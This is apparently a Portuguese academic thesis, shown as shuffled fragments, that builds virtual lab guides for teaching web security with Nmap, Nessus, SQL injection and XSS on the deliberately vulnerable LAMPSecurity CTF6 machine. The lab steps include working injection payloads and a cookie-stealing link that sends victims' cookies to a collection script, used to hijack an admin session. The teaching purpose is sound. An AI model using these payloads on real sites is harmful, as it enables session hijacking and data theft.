52. US 2007 p 53 2 2 Categorias de problemas 2 2 1 Amea as Segundo Bishop 2004 p 4 uma amea a uma potencial viola o de seguran a O fato de uma amea a representar um risco de viola o de seguran a n o significa que necessariamente a viola o ir acontecer mas caso a viola o aconte a ela se concretizar atrav s de um ataque Na vis o de Landwehr 2001 p 6 uma amea a uma inten o de danificar um sistema Uma amea a pode se concretizar atrav s de um ataque de diferentes formas e por isso a determina o da natureza de uma amea a contra as defesas que um sistema deve apresentar deve guiar as decis es a serem tomadas a respeito da arquitetura de seguran a deste sistema Shirey 2000 p 170 divide as amea as em 4 classes e Disclosure revela o de informa es quando h acesso n o autorizado a informa es e Deception fraude Quando dados falsos s o aceitos se passando por verdadeiros 24 e Usurpation usurpa o quando o controle de parte de um sistema ou do sistema como um todo tomado e Disruption interrup o quando h interrup o ou impedimento de uma opera o legal Segundo as classifica es de Shirey 2000 p 170 uma amea a pode estar em mais de uma classe ao mesmo tempo Desta forma entendemos como amea a tudo aquilo que pode causar algum dano ao computador sistema ou rede manifestando se atrav s de um ataque por meio de uma v
53. a das metodologias mais utilizadas para autenticar os usu rios entretanto o uso de tokens smartcards leitura biom trica e outros dispositivos tem aumentado como forma de substitui o das senhas ou at mesmo complemento LANDWEHR 2001 p 8 37 Apesar de o uso de senhas ter sido utilizado por d cadas como a principal forma de autentica o e ser ainda hoje um dos mecanismos de autentica o mais utilizados a utiliza o de senhas possui diversas vulnerabilidades e pode comprometer a autentica o dos usu rios Aplica es mais cr ticas devem possuir mecanismos de autentica o mais rigorosos e seguros os quais devem incluir pelo menos 2 fatores de autentica o e certificados PKI VACCA 2009 p 87 Segundo Landwehr 2001 p 8 as diferentes formas de se autenticar podem depender de 3 fatores e Algo que o usu rio conhece Uma senha uma frase secreta um c digo de acesso etc e Algo que o usu rio possua Um token um cart o de acesso uma chave um smart card etc e Alguma caracter stica do usu rio Impress o digital reconhecimento de voz leitura facial leitura da ris entre outras leituras biom tricas Quanto mais fatores forem utilizados mais forte considerado o mecanismo de autentica o Uma das preocupa es que devemos ter com o processo de autentica o o caso de a rede estar sendo farejada spoofing e as informa es sendo lidas e capturadas Por isso alguns protocolos de
54. a porta de entrada pode ser suficiente para anular todo o restante do trabalho feito Com os novos adventos da tecnologia muitos com rcios passaram a automatizar os seus sistemas e alguns segmentos de mercado perceberam que poderiam aumentar as suas vendas se utilizassem recursos como a Internet Al m dessa grande parte de estabelecimentos que tomaram consci ncia de que o mundo virtual est crescendo e consumindo cada vez mais surgiram tamb m novas micro e macro empresas que apostam exclusivamente nas vendas pela Internet sendo este o seu nico meio de comunica o e venda de produtos e servi os pois algumas delas n o chegam nem a ter um endere o f sico da loja para que o consumidor possa comprar um produto ou servi o pessoalmente Tanto essas empresas que vendem seus produtos exclusivamente pela Internet quanto outras que apenas aderiram s vendas pela Internet como parte de suas vendas investiram recursos e apostaram que tais tecnologias como o e commerce aumentariam os seus lucros Aqui se cria uma das depend ncias mais importantes hoje da necessidade de seguran a computacional para o mundo dos neg cios virtuais Segundo dados da E Consulting Corp 2010 podemos visualizar o grande crescimento dos neg cios realizados via Internet no Brasil Crescimento Varejo Online R Bilh es B Turismo Bens de Consumo m Autos 2002 2003 2004 2005 2006 2007 2008 2009 2010 Figura 1 Crescimento do varejo onl
55. a principal para a realiza o dos testes o framework open source OWASP Mantra dispon vel para download em MANTRA 2012 Dentre as tarefas deste roteiro iremos identificar se o servidor est vulner vel a ataques XSS e posteriormente executar o ataque contra o servidor a fim de que ele atinja como destino final um usu rio como v tima Tarefa 1 Executar um teste simples de inje o de JavaScript para identificar se o servidor vulner vel a ataques XSS Inicialmente necess rio realizar um teste qualquer de inje o de c digo em algum campo do site o qual iremos atacar para saber se o site est realmente vulner vel a 118 ataques XSS A descoberta de vulnerabilidades XSS pode nao ser uma tarefa tao facil Enquanto alguns sites estao totalmente vulneraveis outros podem utilizar alguns filtros mas ainda assim estarem vulneraveis e serem mais dificeis de serem detectados Vamos tentar injetar um c digo JavaScript em um post da pagina inicial para emitir um popup ao abrir a p gina 1 Abra o navegador Mantra e em seguida digite o endere o do servidor HTTP do LAMPSecurity CTF6 para acessar a p gina inicial Ex http 192 168 6 135 2 Clique no sub menu Log In e autentique se com o usuario labtest e senha abtest 3 Clique no sub menu Add Event e preencha o campo Title com Teste de XSS Preencha tamb m o campo Description com o seguinte JavaScript lt script gt alert XSSed lt
56. a rede e quais hosts est o ativos O NMAP oferece suporte descoberta de hosts o que nos permite otimizar as nossas buscas economizar nossos recursos e o nosso tempo Se nenhuma op o de descoberta de hosts for especificada por padr o o NMAP envia pacotes TCP ACK destinados porta 80 e espera um pacote ICMP Internet Control Message Protocol Echo Request como retorno para cada host enviado NMAP A 2012 Dentre as op es para descoberta de hosts temos sL Scan Listagem uma forma simples de listar cada host da rede especificada sem enviar nenhum pacote aos hosts alvo O NMAP ir se utilizar de uma t cnica de DNS reverso para descobrir os nomes dos hosts Neste modo o NMAP ir reportar tamb m ao final da varredura a quantidade de IPs da rede sP Scan usando ping Esta op o faz com que o NMAP realize a varredura na rede apenas usando o ping de forma que somente os hosts ativos ir o responder A consequ ncia de usar o ping para descobrir os hosts ativos da rede o envio de pacotes todos os hosts da rede o que poder levantar suspeitas de que a rede 55 esta sendo varrida Por outro lado pode ser mais valioso saber quais hosts estao ativos na rede do que apenas a listagem dos hosts 0 Sem ping A op o sem ping pula o descobrimento de hosts da rede Nesta op o o NMAP far uma varredura mais agressiva como a varredura de portas e detec o de SO em hosts que foram verificados como ativos PS
57. abilidade Uma falha ou fraqueza em um projeto de sistema implementa o ou opera o e gerenciamento que podem ser explorados para violar a pol tica de seguran a do sistema As vulnerabilidades podem afetar diferentes n veis podendo ser desde uma falha de hardware at os mais altos n veis de software A ISO IEC 27005 2008 p 12 classifica algumas das reas nas quais vulnerabilidades podem ser encontradas e Organiza o e Processos e procedimentos e Gerenciamento de rotinas e Pessoal e Ambiente f sico e Configura o de informa o de sistema e Hardware software ou equipamentos de comunica o e Depend ncia externa Vulnerabilidades s o comuns e frequentemente encontramos novas vulnerabilidades em nossos sistemas sendo que as mais comuns s o as de software devido ao grande n mero de programas e aplicativos presentes em nosso dia a dia e suas constantes atualiza es que podem muitas vezes conter falhas de software software bugs Al m das falhas de software outros elementos podem ocasionar vulnerabilidades como falhas no gerenciamento de senhas falhas no projeto de sistemas operacionais e at mesmo entradas de usu rio n o verificadas VACCA 2009 p 392 27 7000 6000 5000 4000 Amount 3000 2000 1000 2006 2007 2008 2009 2010 a Vulnerabilities Figura 4 Total de vulnerabilidades identificadas 2006 2010 SYMANTEC 2011 O n mero de vulnerabil
58. ados criada para o usu rio contendo os dados maliciosos que foram originalmente enviados mas de uma maneira que a apresenta o dos dados seja similar apresentada pelo web site original Consequ ncias de um ataque XSS 50 Um atacante pode usar XSS para enviar um script malicioso ao browser de um usuario confiavel sem que o browser do usuario final saiba que o script nao confi vel Desta forma o browser ir executar o script e ir considerar que o script veio de uma fonte confi vel O script malicioso pode acessar qualquer cookie sess o de tokens ou qualquer outra informa o importante armazenada pelo browser do usu rio e utilizada naquele site Alguns scripts s o at capazes de reescrever paginas HTML OWASP 2011 Eventualmente atacantes ir o injetar JavaScript VBScript ActiveX HTML ou Flash em uma aplica o vulner vel para enganar um usu rio e coletar informa es Pode haver diversas consequ ncias tais como sequestro de sess o altera o nas configura es do usu rio roubo ou envenenamento de cookies e at propagandas falsas CGI Security 2012 Esse tipo de ataque n o pode ser evitado pelo fato de se usar criptografia como por exemplo uma conex o SSL Secure Socket Layer A aplica o web com SSL funciona da mesma forma e os dados continuar o sendo criptografados entretanto os dados em si que s o maliciosos e ao serem decodificados em seu destino final e executados far o o ataq
59. ados Esses detalhes podem fornecer informa es importantes referentes estrutura do Web site para o atacante facilitando a descoberta de falhas Mensagens de erro de tabelas podem ser usadas para extrair informa es das tabelas e auxiliar na 44 constru o de inje es com o intuito de escapar da requisi o do desenvolvedor ou manipular as informa es contidas na tabela e Manipula o Incorreta de Submiss es M ltiplas Desenvolvedores de aplica es tendem a projetar aplica es as quais guiar o os usu rios por um fluxo esperado do processo imaginando que o usu rio ir seguir os passos l gicos que foram projetados Por exemplo eles esperam que se um usu rio chegou at o terceiro formul rio em uma s rie de formul rios ent o o usu rio deve ter preenchido o primeiro e o segundo formul rios Na realidade frequentemente muito simples desviar do fluxo de dados esperado requisitando os recursos fora de ordem diretamente atrav s de seus URLs Um atacante pode acessar o segundo formul rio diretamente sem acessar o primeiro ou ele pode simplesmente enviar dados v lidos como entrada para o primeiro formul rio e depois manipular estes dados quando eles forem enviados ao segundo formul rio Desta forma a aplica o ir considerar que os dados do primeiro formul rio que acompanham o segundo formul rio j foram validados quando na verdade estes dados podem ter sido alterados Tendo como base os pontos de
60. ambiente laboratorial preparado para o caso em quest o pode ser muito til pois outros problemas relativos ou n o ao que est sendo estudado n o ir o interferir nos resultados do teste ou do experimento 15 1 3 Objetivo geral Como objetivo geral o trabalho visa a cria o de roteiros laboratoriais que permitem ao aluno seguir uma sequ ncia de atividades definidas em ambientes virtualizados para o ensino pr tico de seguran a computacional O material pode ser disponibilizado para utiliza o em laborat rios de ensino de inform tica visando proporcionar suporte te rico e pr tico para algumas atividades espec ficas que podem ser realizadas em ambientes controlados 1 4 Objetivos espec ficos O trabalho tem como objetivos espec ficos e Conceituar os problemas e propriedades de seguran a e Elencar os principais problemas de inje o encontrados em aplica es web e Elencar as principais ferramentas de an lise de seguran a e Definir roteiros laboratoriais espec ficos para os problemas e ferramentas e Utilizar ambientes virtuais onde possam ser aplicados os roteiros desenvolvidos 1 5 Estrutura do trabalho O trabalho encontra se dividido em 7 cap tulos O primeiro cap tulo apresenta a introdu o do trabalho contemplando a motiva o a descri o do problema o objetivo geral e objetivos espec ficos a serem atingidos O segundo cap tulo apresenta conceitos b sicos de seguran a computacional mo
61. amente percept vel levando uma empresa a perder credibilidade por causa de incidentes de seguran a Como a credibilidade um fator importante principalmente para o mundo dos neg cios muitas empresas come aram a perceber que realmente vale pena investir na seguran a de seus sistemas e redes Estat sticas mostram o impacto financeiro causado por algumas amea as nos Estados Unidos Segundo a Computer Economics COM 03 os preju zos nos Estados Unidos em 1999 foram de 12 1 bilh es de d lares dos quais 1 2 bilh o de d lares foram referentes ao v rus Melissa J o v rus Love You ou Love Bug causou em 2000 um preju zo de 6 7 bilh es de d lares somente nos seus cinco primeiros dias Em 2000 os preju zos chegaram a 17 1 bilh es de d lares ou seja um crescimento de mais de 40 com rela o ao ano anterior J em 2001 os preju zos estimados foram de 13 2 bilh es de d lares COM 03 J o Slammer Worm que atingiu um grande n mero de sistemas no in cio de 2008 23 causou preju zos entre 950 milh es de d lares e 1 2 bilh o de d lares em perda de produtividade nos cinco primeiros dias de contamina o LEM 03 mi2g 031 NAKAMURA GEUS 2007 55 Com o aumento da preocupa o das empresas em seguran a temos como avan o 60 das empresas pesquisadas dos Estados Unidos possuindo ao menos 1 pessoa dedicada ao assunto de seguran a J no Brasil este n mero sobe para 98 NAKAMURA GE
62. ar pacotes em estado bruto ou varrer redes IPv6 Ao inv s de criar pacotes em estado bruto como a maioria dos outros tipos de varreduras fazem o Nmap pede ao sistema operacional para estabelecer uma conex o com a m quina e porta alvos enviando uma chamada de sistema connect Essa a mesma chamada de alto n vel que os navegadores da web clientes P2P e a maioria das outras aplica es para rede utilizam para estabelecer uma conex o Quando uma varredura SYN est dispon vel normalmente a melhor escolha O Nmap tem menos controle sobre a chamada de alto n vel connect do que sobre os pacotes em estado bruto tornando o menos eficiente A chamada de sistema 58 completa as conex es nas portas alvo abertas ao inv s de executar o reset de porta entreaberta que a varredura SYN faz Isso n o s leva mais tempo e requer mais pacotes para obter a mesma informa o mas tamb m torna mais prov vel que as m quinas alvo registrem a conex o permitindo que um sistema IDS Intrusion Detection System detecte a varredura SU scan UDP Pelo fato da varredura UDP ser normalmente mais lenta e mais dif cil que a TCP alguns auditores de seguran a ignoram essas portas Isso um erro pois servi os UDP pass veis de explora o s o bastante comuns e invasores certamente n o ignoram essa possibilidade de explora o A varredura UDP ativada com a op o 5 e pode ser combinada com um tipo de varredura TCP como a varredura SYN
63. cesso pois h firewalls que est o configurados para 88 bloquearem todos ou quase todos os tipos de pacotes de hosts desconhecidos Desta forma a maquina alvo pode nao responder a nenhum pacote ICMP impedindo a detec o 6 Fa a o teste novamente repetindo o comando nmap PU v 192 168 6 1 24 mas desta vez ative o Firewall do Windows de uma das m quinas virtuais e veja o resultado Como mostrado na figura 18 voc pode ativar o Firewall clicando duplamente no cone do escudo vermelho pr ximo ao rel gio e em seguida v at Gerenciar configura es de seguran a para e clique em Firewall do Windows Na aba Geral selecione a op o Ativado e clique em OK Central de Seguran a do Windows Jeje Central de Seguran a Ajude a proteger o seu PC Recursos Dados B sicos de Seguran a Central de Seguran a ajuda a gerenciar as configura es de seguran a do Windows Para ajudar a proteger seu computador certifique se de que os tr s elementos b sicos de seguran a est o ATIVADOS Se as configura es de seguran a n o estiverem ATIVADAS siga as recomenda es Para voltar Central de Seguran a mais tarde abra o Painel de Controle A O que h de novo no Windows para ajudar a proteger meu computador Firewall do Windows Geral Exce es l Avan ado d Firew WW G Firewall ATIVADO vum 2 Atualiza es autom ticas DESATIVADO x O Firewall do
64. ckage Enumeration Apache Banner Linux Distribution Disclosure Software Enumeration SSH Backported Security Patch Detection WWW Figura 25 Tela de relat rios do Nessus user Help About Log out Download Report Remove Vulnerability Audit Trail e Clear Filters b Sen DNS Web Servers Web Servers Firewalls Port scanners Settings General Misc General Service detection General General Web Servers General Service detection Web Servers General Web Servers General Service detection DNS General Settings Web Servers General General Na tela da figura 25 temos a lista de vulnerabilidades encontradas em todos os hosts da rede alvo classificados de acordo com a gravidade do risco 101 3 Para visualizar a lista de vulnerabilidades encontradas em um host especifico da rede basta clicar no topo do relat rio em Host Summary como mostra a figura 26 user Help About Log out Reports Scans Policies Varredura de Rede Virtual 1 Vulnerability Summary Host Summary Download Report Completed Apr 1 2012 8 40 Audit Trail Filters No Filters Add Filter Clear Filters 192 168 6 131 192 168 6 2 192 168 6 1 192 168 6 133 192 168 6 254 Figura 26 Sele o da op o Host Summary no Nessus Desta forma poss vel visualizar em cada linha da tabela um host diferente da rede alvo e um gr fico colorido indicando o n mero de vulnerabilidades encontradas de acordo com a grav
65. comando que utiliza as duas op es ao mesmo tempo sudo nmap v sS sU 192 168 6 X Fa a o teste e note que agora o Nmap varre a procura de portas utilizando ambos protocolos TCP e UDP 6 2 Scanner de Vulnerabilidades Utilizando o NESSUS Objetivos 92 Entender e criar pol ticas de varredura para os nossos testes Descobrir vulnerabilidades de seguran a em diferentes hosts da rede interna e externa Analisar o resultado de tais vulnerabilidades e as medidas que podem ser tomadas para mitig las ou elimin las Pr Requisitos Leitura da se o 4 2 Scanner de Vulnerabilidades NESSUS Execu o simult nea de pelo menos 1 m quina virtual Windows e 1 m quina virtual Ubuntu para a realiza o dos testes Neste roteiro vamos utilizar o Nessus em sua vers o 5 0 0 instalado na m quina virtual Ubuntu para procurar por vulnerabilidades em hosts da rede Windows e Linux e posteriormente analisar estas vulnerabilidades para saber qual o grau de risco de cada uma delas e o que podemos fazer para mitig las ou at elimin las O Nessus j encontra se instalado em nossa m quina virtual Ubuntu que a m quina que utilizaremos para executar o Nessus e realizar as varreduras por vulnerabilidades Entretanto para instalarmos e configurarmos o Nessus em sistemas Ubuntu devemos proceder da seguinte forma 1 Va at o site TENABLE 2012 clique em AGREE concordar com os term
66. cri o para o seguinte c digo HTML lt meta http equiv Refresh content 3 url http www google com br gt 3 Clique no bot o Add event e em seguida v para a p gina inicial visualizar o resultado clicando no sub menu Home Voc perceber que ao acessar a p gina inicial nada de diferente exibido mas ap s 3 segundos a p gina redirecionada para a p gina do Google a qual escolhemos O tempo ainda pode ser reduzido para 0 a fim de que redirecionamento ocorra quase que imediatamente entretanto estamos utilizando 3 segundos para podermos ter tempo suficiente para clicar em Edit this event e alterar o post Tarefa 3 Realizar o roubo de cookies de usu rios que clicarem em um link malicioso e posteriormente obter acesso no site utilizando o cookie roubado Nesta tarefa iremos criar uma armadilha na qual usu rios que clicarem em um link malicioso ter o os seus cookies roubados Com posse dos cookies de outros 120 usu rios iremos acessar site atacado e autenticar nos com as credenciais destes usu rios Para que possamos roubar os cookies iremos criar um script para consolidar o roubo e posteriormente precisaremos armazenar os cookies roubados em algum lugar Para isso iremos utilizar o servidor Apache instalado em nossa m quina virtual Windows 1 Crie no diret rio C Arquivos de programas Apache Software Foundation Apache2 2 htdocs dois arquivos log txt e steal php O arquivo
67. do o relat rio clicando no canto superior direito do relat rio no Nessus em Download Report 5 Agora que voc j sabe analisar os resultados obtidos analise cautelosamente cada vulnerabilidade encontrada nos relat rios de ambas as varreduras realizadas para aprender um pouco mais sobre elas 103 6 3 SQL Injection Utilizando o MANTRA Objetivos e Utilizar conhecimentos da linguagem SQL para obter informa es armazenadas em um servidor vulner vel e Utilizar comandos SQL para obter acesso privilegiado ao servidor vulner vel Pr Requisitos e Leitura da se o 3 1 1 SQL Injection e Conhecimentos b sicos da sintaxe SQL e Execu o simult nea de 1 m quina virtual Windows ou Ubuntu e 1 m quina virtual CentOS5 LAMPSecurity CTF6 para a realiza o dos testes Neste roteiro vamos utilizar uma m quina virtual externa ao desenvolvimento deste trabalho chamada LAMPSecurity CTF6 que um servidor preparado com falhas propositais para que possamos explor las Para obt la basta acessar SOURCE FORGE 2012 Uma c pia desta m quina virtual est dispon vel junto com as demais m quinas virtuais deste trabalho Al m da m quina LAMPSecurity CTF6 que iremos utilizar como alvo em nossos testes iremos utilizar como ferramenta principal para a realiza o dos testes o framework open source OWASP Mantra dispon vel para download em MANTRA 2012 O framework Mantra foi constru do na forma de b
68. dos de usu rio labtest e senha labtest 3 Em seguida localize o post da tarefa anterior com o t tulo Teste de XSS e clique em Edit this event 4 Troque o campo Description para o seguinte c digo HTML substitua o endere o IP para o endere o IP de sua m quina virtual Windows lt a onclick document location http 192 168 6 131 steal php cookie escape document cookie href gt Clique aqui para mais informacoes lt a gt 5 Clique em Add event Pronto A armadilha est criada A partir de agora qualquer usu rio que esteja autenticado perante o site e clicar no link que acabamos de publicar ter seu cookie roubado O pr ximo passo simular a a o de uma v tima 6 Repita o procedimento de Log in no site mas desta vez entre com os dados de usu rio admin e senha adminpass 7 Clique no link Clique aqui para mais informacoes que aparece na p gina inicial do site e observe o que acontece 8 Clique em Log Out na barra superior para encerrar a sess o Agora voltemos ao atacante e vamos observar os resultados ap s o acesso ao link por uma v tima 9 Abra o arquivo log txt que voc criou anteriormente e veja o seu conte do 122 O conte do do arquivo armazena agora o cookie roubado da v tima Iremos utilizar estas informa es para nos autenticar perante ao site com as credenciais desta v tima Voc deve visualizar no campo COOKIE algo como a figura 43
69. down If it is really up but blocking our ping probes try PN Nmap done 1 IP address hosts up scanned in 3 17 seconds labtestQubuntu Figura 19 Exemplo 4 de sa da do NMAP 2 Agora v at a m quina virtual Windows e desative o firewall similarmente ao m todo explicado na figura 18 e repita o teste labtest ubuntu File Edit View Search Terminal Help Completed Ping Scan at 04 39 1 10s elapsed 1 total hosts Initiating Parallel DNS resolution of 1 host at 04 39 Completed Parallel DNS resolution of 1 host at 04 39 155 elapsed Initiating Connect Scan at 04 39 Scanning 192 168 6 131 1000 ports Discovered open port 445 tcp on 192 168 6 131 Discovered open port 139 tcp on 192 168 6 131 Discovered open port 135 tcp on 192 168 6 131 Discovered open port 80 tcp on 192 168 6 131 Completed Connect Scan at 04 39 1 58s elapsed 1000 total ports Nmap scan report for 192 168 6 131 Host is up 0 0019s latency Not shown 996 closed ports PORT STATE SERVICE 80 tcp open http 135 tcp open msrpc 139 tcp open netbios ssn 445 tcp open microsoft ds Read data files from usr share nmap Nmap done 1 IP address 1 host up scanned in 2 94 seconds labtestQubuntu Figura 20 Exemplo 5 de sa da do NMAP Como mostra a figura 20 voc ver que agora o Nmap consegue detectar que o host est ativo na rede e consegue detectar tamb m as suas portas abertas Mas esta t cnica s interessante d
70. e 1 Y v SQL 55 Encryption Encodingr Other Load URL http 192 168 6 135 id 01 th Split URL b Execute Enable Post data Enable Referrer About Widgets Widgets Inc CTF 6 Widgets Inc Homepage Home Log In In About Us Are you looking to buy or sell widgets Widgets Inc is the internet s longest running and most respected vendor of widgets We News amp Announcements Figura 37 Como abrir a hackbar no MANTRA Vamos utilizar a cl usula ORDER BY do MySQL para tentar descobrir o n mero de tabelas utilizadas na base de dados para gerar a p gina 5 Acrescente na hackbar a cl usula order by da seguinte forma http 192 168 6 135 id 01 order by 1 113 6 Em seguida selecione o numero 1 que segue a cl usula order by e utilize o bot o localizado na parte superior da hackbar para aumentar o n mero de tabelas da cl usula order by at que a p gina se modifique A figura 38 mostra o bot o para incrementar o n mero de tabelas da cl usula order by x 192 168 6 135 7id 01 order by n ALcookes Css Information INT v SQL XSS Encryption Encodingr i Load URL http 192 168 6 135 2id 01 order by Split URL Execute Enable Post data Enable Referrer Figura 38 Bot o para incremento do n mero de tabelas na hackba
71. e portas Apesar de o NMAP tamb m servir para outras funcionalidades como a detec o de vers es e tipos de sistemas operacionais n o iremos abordar estas pr ticas neste roteiro pois existem outras ferramentas que tamb m desempenham essas fun es como o Nessus scan de vulnerabilidades no qual iremos tratar deste assunto na se o 6 2 entitulada Scanner de Vulnerabilidades Utilizando o NESSUS No ambiente virtual o qual iremos testar o NMAP a ferramenta j encontra se instalada em sua vers o 5 21 Entretanto para instal lo no Ubuntu basta utilizarmos o terminal e instalarmos o pacote do nmap sudo apt get install nmap Se preferir voc ainda pode instalar uma interface gr fica para utilizar o NMAP chamada ZenMap atrav s do comando sudo apt get install zenmap Para instalar o Nmap no Windows basta baixar o execut vel em NMAP B 2012 e seguir os passos de instala o padr es deixando marcado para a instala o todos os componentes que acompanham o instalador como mostra a figura 9 Nmap Setup Choose Components Choose which features of Nmap you want to install 7 Check the components you want to install and uncheck the components you don t want to install Click Next to continue Select components to install Nmap Core Files Register Nmap Path WinPcap 4 1 2 Network Performance Imp Zenmap GUI Frontend Neat Modern Netcat reir Ndiff Scan comparison to Nping Packet generator lt g
72. e nos hosts Entretanto algumas pol ticas de seguran a firewalls n veis de isolamento e acesso de dispositivos podem ser centralizadas e refor adas n vel da m quina f sica deixando a m quina virtual do host completamente no controle do usu rio sem nenhuma implica o de seguran a Para Vacca 2009 p 699 um dos benef cios da virtualiza o a seguran a proporcionada pelo isolamento da m quina virtual Por outro lado alguns c digos maliciosos passaram a adquirir a habilidade de detectar se est o sendo executados dentro de um ambiente virtual ou n o Pesquisas mostraram que c digos maliciosos podem escapar do ambiente virtual e atacar a m quina hospedeira ou ao menos roubar informa es dela Em resposta a tais fatos os desenvolvedores da rea de seguran a est o adaptando novas caracter sticas e funcionalidades na virtualiza o de sistemas para corrigir as vulnerabilidades e detectar tais ataques 72 Apesar da possibilidade de ataques a m quina hospedeira pela utiliza o de m quinas virtuais ambientes virtualzados s o considerados seguros e s o recomendados por diversos autores como ferramenta para o ensino de seguran a e outras atividades 5 3 Trabalhos relacionados com o uso de virtualiza o no ensino de seguran a O material de ensino em seguran a de aplica es web muito limitado e existe a necessidade de desenvolvimento de novos materiais para o ensino que abordem os problema
73. e obtivemos 14 Clique em Log In no menu da p gina entre com os dados obtidos Username admin e Password adminpass e clique no bot o Log In Veja que obtivemos acesso de administrador na p gina e alguns menus extras aparecem na p gina 6 4 Cross Site Scripting XSS Utilizando o MANTRA Objetivos e Utilizar conhecimentos de JavaScript para obter dados de acesso de usu rios em um servidor vulner vel e Modificar a visualiza o de uma p gina em um servidor vulner vel e Causar o redirecionamento autom tico de uma p gina por meio de um ataque XSS 117 e Criar um link com c digo camuflado com o intuito de enganar v timas levando as para p ginas modificadas Pr Requisitos e Leitura da se o 3 1 2 Cross Site Scripting XSS e Conhecimentos b sicos de JavaScript e Conhecimentos b sicos de PHP e Execu o simult nea de 1 m quina virtual Windows e 1 m quina virtual CentOS5 LAMPSecurity CTF6 para a realiza o dos testes Neste roteiro vamos utilizar uma m quina virtual externa ao desenvolvimento deste trabalho chamada LAMPSecurity CTF6 que um servidor preparado com falhas propositais para que possamos explor las Para obt la basta acessar SOURCE FORGE 2012 Uma c pia desta m quina virtual est dispon vel junto com as demais m quinas virtuais deste trabalho Al m da m quina LAMPSecurity CTF6 que iremos utilizar como alvo em nossos testes iremos utilizar como ferrament
74. e que ao mesmo tempo ela preocupe se com a seguran a que protege os seus neg cios Conforme o gr fico do CERT 2011 os dados revelam um aumento nos incidentes de seguran a envolvendo a Internet de 1999 a 2009 Total de Incidentes Reportados ao CERT br por Ano 400000 320000 229900 222528 197892 160080 142844 90759 75722 54607 12301 pom 3107 5997 uum m 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 Ano 1999 a marco de 2011 160000 Total de Incidentes Figura 2 Total de Incidentes Reportados ao CERT br por Ano CERT 2011 22 Apesar de o numero de incidentes nao ter um aumento constante podendo apresentar redu es por curtos ou longos per odos de tempo conforme mostra a Figura 2 n o devemos pensar que este seria um motivo para deixar de investir em seguran a uma quest o de tempo para que novas falhas e brechas sejam encontradas podendo ocorrer que em per odos com uma queda no n mero de incidentes de seguran a algumas falhas pr existentes ainda n o tenham sido descobertas O aumento no n mero de amea as vem fazendo com que mais empresas preocupem se com o assunto seguran a Um dos fatores que levam algumas empresas a n o sentirem a necessidade de um investimento maior em seguran a o fato de a seguran a ser imensur vel e n o trazer um retorno vis vel para os olhos de muitos Entretanto a n o exist ncia de seguran a pode se tornar rapid
75. e ser usada no caso de o usu rio n o ter privil gios de administrador pois ela tentar se conectar utilizando o protocolo TCP com cada porta do host alvo e por isso pode ser facilmente detectada visto que ela 91 ir completar a conex o em caso de encontrar uma porta aberta Al m disso ela pode facilmente falhar em seus resultados caso encontre algum bloqueio pela frente como um firewall Situa o 2 Voc tem privil gios de administrador ou root e quer fazer uma varredura nos hosts descobertos a procura de portas O fato de termos privil gios de administrador nos permite a utiliza o de pacotes brutos para a investiga o de portas nos hosts alvos Para isso a op o mais utilizada no Nmap para descoberta de portas a Scan TCP SYN que da mesma forma como vimos na descoberta de hosts n o completa a conex o com as portas alvo e mais dif cil de ser detectada 3 Para test la digite o comando sudo nmap 55 192 168 6 X em um terminal Ubuntu e em seguida digite a senha do usu rio labtest Entretanto a presen a de firewalls atrapalha os resultados de varreduras realizadas com esta op o 4 Fa a o teste com o firewall do Windows ativado e desativado Para maximizar as chances de passar por firewalls pode se acrescentar varredura a op o de Scan UDP sU mas isso tornar a varredura mais lenta e nao garantir os resultados caso o firewall tamb m bloqueie pacotes UDP Assim podemos criar um novo
76. e uma senha criptografada como mostra a figura 40 News amp Announcements Mauris Vel Posted by admin Lorem ipsum dolor sit amet consectetur adipiscing elit Integer pharetra nulla a velit euismod aliquam Suspendisse potenti Lorem ipsum dolor sit amet consectetur adipiscing elit Class aptent taciti sociosqu ad litora torquent per conubia nostra per inceptos himenaeos Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae Duis eu felis a velit sollicitudin ullamcorper quis et sapien Proin lacinia mauris euismod pulvinar iaculis elit dolor interdum ipsum eu iaculis leo nisi sit amet enim Phasellus nunc augue commodo sed eleifend in ullamcorper a sapien Phasellus non posuere massa Morbi sed posuere urna Donec tincidunt congue ipsum nec vehicula Nullam quis nulla erat Phasellus semper pretium magna at faucibus Pellentesque sed enim nec dui posuere blandit Maecenas malesuada blandit mauris vel tincidunt Praesent vitae nibh erat Donec tincidunt blandit aliquam Donec pulvinar suscipit viverra Fusce vitae diam non orci adipiscing dapibus nec in tortor Donec laoreet feugiat adipiscing Fusce at augue dignissim mauris tincidunt tincidunt Sed at odio ut nisi vehicula porttitor Quisque elementum ligula et libero hendrerit lacinia ac vel eros Class aptent taciti sociosqu ad litora torquent per conubia nostra per inceptos himenaeos Suspendisse ut magna sem eget pellentesque turpis Nam ut
77. eguran a do sistema 36 criptografico A chave publica deve ser de conhecimento publico e por isso deve ser amplamente divulgada Este tipo de sistema criptogr fico largamente utilizado em assinaturas e certificados digitais LANDWEHR 2001 p 10 A utiliza o da criptografia nos dias de hoje est presente em diversos tipos de aplica es como por exemplo na utiliza o de SSL Secure Socket Layer TLS Transport Layer Security e VPN Virtual Private Network nos quais a criptografia a base do funcionamento H ainda aplica es locais como a prote o de arquivos e at discos r gidos inteiros A prote o de discos r gidos pode ajudar na preven o do roubo de dados em caso de roubo de laptops ou de dispositivos de armazenamento por exemplo LANDWEHR 2001 p 10 2 5 2 Autentica o Vacca 2009 p 49 define Autentica o simplesmente provar que a requisi o de identidade de um usu rio v lida e aut ntica E ainda completa Autentica o requer algum tipo de prova de identidade A identifica o e a autentica o se complementam No processo de identifica o necess rio que o usu rio se identifique perante o sistema declarando a sua identidade Posteriormente o processo de autentica o tem a fun o de validar a identidade apresentada pelo usu rio no processo de identifica o NAKAMURA GEUS 2007 p 364 A utiliza o de IDs de usu rio e senhas continua sendo um
